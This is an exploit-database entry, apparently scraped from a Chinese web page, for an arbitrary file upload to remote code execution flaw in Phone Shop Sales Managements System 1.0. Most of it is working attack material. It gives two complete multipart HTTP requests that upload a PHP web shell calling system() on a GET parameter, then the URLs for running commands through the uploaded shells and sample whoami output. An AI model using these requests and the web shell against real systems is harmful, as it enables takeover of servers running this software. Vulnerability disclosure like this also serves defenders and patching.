扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 |
# Exploit Title: Phone Shop Sales Managements System 1.0 - 'Multiple' Arbitrary File Upload to Remote Code Execution # Date: 2021-07-06 # Exploit Author: faisalfs10x (https://github.com/faisalfs10x) # Vendor Homepage: https://www.sourcecodester.com/ # Software Link: https://www.sourcecodester.com/php/10882/phone-shop-sales-managements-system.html # Version: 1.0 # Tested on: Windows 10, XAMPP ########### # PoC 1:# ########### Request: ======== POST /osms/Execute/ExAddProduct.php HTTP/1.1 Host: localhost Content-Length: 2160 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://localhost Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryIBZWMUliFtu0otJ0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://localhost/osms/AddNewProduct.php Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=6i2a5u327llvco5kgglbalhdn0 Connection: close ------WebKitFormBoundaryIBZWMUliFtu0otJ0 Content-Disposition: form-data; name="ProductName" camera ------WebKitFormBoundaryIBZWMUliFtu0otJ0 Content-Disposition: form-data; name="BrandName" soskod ------WebKitFormBoundaryIBZWMUliFtu0otJ0 Content-Disposition: form-data; name="ProductPrice" 12 ------WebKitFormBoundaryIBZWMUliFtu0otJ0 Content-Disposition: form-data; name="Quantity" 1 ------WebKitFormBoundaryIBZWMUliFtu0otJ0 Content-Disposition: form-data; name="TotalPrice" 12 ------WebKitFormBoundaryIBZWMUliFtu0otJ0 Content-Disposition: form-data; name="DisplaySize" 15 ------WebKitFormBoundaryIBZWMUliFtu0otJ0 Content-Disposition: form-data; name="OperatingSystem" windows ------WebKitFormBoundaryIBZWMUliFtu0otJ0 Content-Disposition: form-data; name="Processor" 4 ------WebKitFormBoundaryIBZWMUliFtu0otJ0 Content-Disposition: form-data; name="InternalMemory" 4 ------WebKitFormBoundaryIBZWMUliFtu0otJ0 Content-Disposition: form-data; name="RAM" 4 ------WebKitFormBoundaryIBZWMUliFtu0otJ0 Content-Disposition: form-data; name="CameraDescription" lens ------WebKitFormBoundaryIBZWMUliFtu0otJ0 Content-Disposition: form-data; name="BatteryLife" 3300 ------WebKitFormBoundaryIBZWMUliFtu0otJ0 Content-Disposition: form-data; name="Weight" 500 ------WebKitFormBoundaryIBZWMUliFtu0otJ0 Content-Disposition: form-data; name="Model" AIG34 ------WebKitFormBoundaryIBZWMUliFtu0otJ0 Content-Disposition: form-data; name="Dimension" 5 inch ------WebKitFormBoundaryIBZWMUliFtu0otJ0 Content-Disposition: form-data; name="ASIN" 9867638 ------WebKitFormBoundaryIBZWMUliFtu0otJ0 Content-Disposition: form-data; name="ProductImage"; filename="rev.php" Content-Type: application/octet-stream <?php echo "result: ";system($_GET['rev']); ?> ------WebKitFormBoundaryIBZWMUliFtu0otJ0 Content-Disposition: form-data; name="date2" 2020-06-03 ------WebKitFormBoundaryIBZWMUliFtu0otJ0 Content-Disposition: form-data; name="Description" accept ------WebKitFormBoundaryIBZWMUliFtu0otJ0 Content-Disposition: form-data; name="_wysihtml5_mode" 1 ------WebKitFormBoundaryIBZWMUliFtu0otJ0-- ########### # PoC 2:# ########### Request: ======== POST /osms/Execute/ExChangePicture.php HTTP/1.1 Host: localhost Content-Length: 463 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://localhost Content-Type: multipart/form-data; boundary=----WebKitFormBoundary4Dm8cGBqGNansHqI User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://localhost/osms/UserProfile.php Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=4nksm1jl45bfbbd5ovn0fpi594 Connection: close ------WebKitFormBoundary4Dm8cGBqGNansHqI Content-Disposition: form-data; name="IDUser" 6 ------WebKitFormBoundary4Dm8cGBqGNansHqI Content-Disposition: form-data; name="Image"; filename="rev.php" Content-Type: application/octet-stream <?php echo "output: ";system($_GET['rev']); ?> ------WebKitFormBoundary4Dm8cGBqGNansHqI-- ########### # Access: # ########### # Webshell access via: PoC 1: http://localhost/osms/assets/img/Product_Uploaded/rev.php?rev=whoami PoC 2: http://localhost/osms/assets/img/Profile_Uploaded/rev.php?rev=whoami # Output: result: windows10\user |
体验盒子
